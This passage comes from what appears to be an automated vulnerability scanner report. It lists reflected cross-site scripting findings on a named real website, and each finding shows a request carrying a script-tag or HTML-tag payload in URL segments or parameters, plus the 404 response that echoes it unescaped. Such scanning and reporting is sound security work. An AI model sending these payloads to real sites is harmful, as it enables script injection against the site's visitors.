The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 78d9e<script>alert(1)</script>ef2bea8344c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/2half.gif78d9e<script>alert(1)</script>ef2bea8344c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/2half.gif78d9e<script>alert(1)</script>ef2bea8344c was not found on this server.</p>
...[SNIP]...

2.503. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/2half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/2half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 48e56<script>alert(1)</script>7c538e3cc70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/2half.gif?48e56<script>alert(1)</script>7c538e3cc70=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/2half.gif?48e56<script>alert(1)</script>7c538e3cc70=1 was not found on this server.</p>
...[SNIP]...

2.504. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b4073<script>alert(1)</script>50f782fcece was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicationb4073<script>alert(1)</script>50f782fcece/broadband/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicationb4073<script>alert(1)</script>50f782fcece/broadband/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.505. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d827b<script>alert(1)</script>a81bbd1177d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbandd827b<script>alert(1)</script>a81bbd1177d/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandd827b<script>alert(1)</script>a81bbd1177d/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.506. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 34885<script>alert(1)</script>ae3cc3769e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes34885<script>alert(1)</script>ae3cc3769e3/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes34885<script>alert(1)</script>ae3cc3769e3/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.507. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a3d36<script>alert(1)</script>8f0614bfa87 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmosa3d36<script>alert(1)</script>8f0614bfa87/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmosa3d36<script>alert(1)</script>8f0614bfa87/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.508. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e06cf<script>alert(1)</script>3401b96f7d9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagese06cf<script>alert(1)</script>3401b96f7d9/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagese06cf<script>alert(1)</script>3401b96f7d9/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.509. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a86e7<script>alert(1)</script>43a2edda5d4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/ratinga86e7<script>alert(1)</script>43a2edda5d4/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/ratinga86e7<script>alert(1)</script>43a2edda5d4/5.gif was not found on this server.</p>
...[SNIP]...

2.510. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload aeaf0<script>alert(1)</script>b26a5aa798c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/5.gifaeaf0<script>alert(1)</script>b26a5aa798c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/5.gifaeaf0<script>alert(1)</script>b26a5aa798c was not found on this server.</p>
...[SNIP]...

2.511. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/5.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/5.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ac280<script>alert(1)</script>98052748352 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/5.gif?ac280<script>alert(1)</script>98052748352=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/5.gif?ac280<script>alert(1)</script>98052748352=1 was not found on this server.</p>
...[SNIP]...

2.512. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e68b8<script>alert(1)</script>8e2b062ef60 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communicatione68b8<script>alert(1)</script>8e2b062ef60/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communicatione68b8<script>alert(1)</script>8e2b062ef60/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.513. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fb685<script>alert(1)</script>76a1842f21b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadbandfb685<script>alert(1)</script>76a1842f21b/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadbandfb685<script>alert(1)</script>76a1842f21b/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.514. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 34eae<script>alert(1)</script>291a60e6b88 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes34eae<script>alert(1)</script>291a60e6b88/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes34eae<script>alert(1)</script>291a60e6b88/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.515. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 114df<script>alert(1)</script>f3281c74ddb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos114df<script>alert(1)</script>f3281c74ddb/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos114df<script>alert(1)</script>f3281c74ddb/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.516. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ae58c<script>alert(1)</script>710587e5352 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/imagesae58c<script>alert(1)</script>710587e5352/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/imagesae58c<script>alert(1)</script>710587e5352/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.517. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6c658<script>alert(1)</script>e5dcabd2f7c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating6c658<script>alert(1)</script>e5dcabd2f7c/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:38:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating6c658<script>alert(1)</script>e5dcabd2f7c/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.518. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e3710<script>alert(1)</script>9999576a960 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /communication/broadband/themes/kosmos/images/rating/search.phpe3710<script>alert(1)</script>9999576a960?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:39:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/search.phpe3710<script>alert(1)</script>9999576a960?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.519. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d097e<a>8485135248f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchd097e<a>8485135248f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchd097e<a>8485135248f&opt=2 was not found on this server.</p>
...[SNIP]...

2.520. http://www.resellerbase.com/communication/broadband/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /communication/broadband/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b26d8<a>81963b75d98 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /communication/broadband/themes/kosmos/images/rating/search.php?keyword=search...b26d8<a>81963b75d98&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
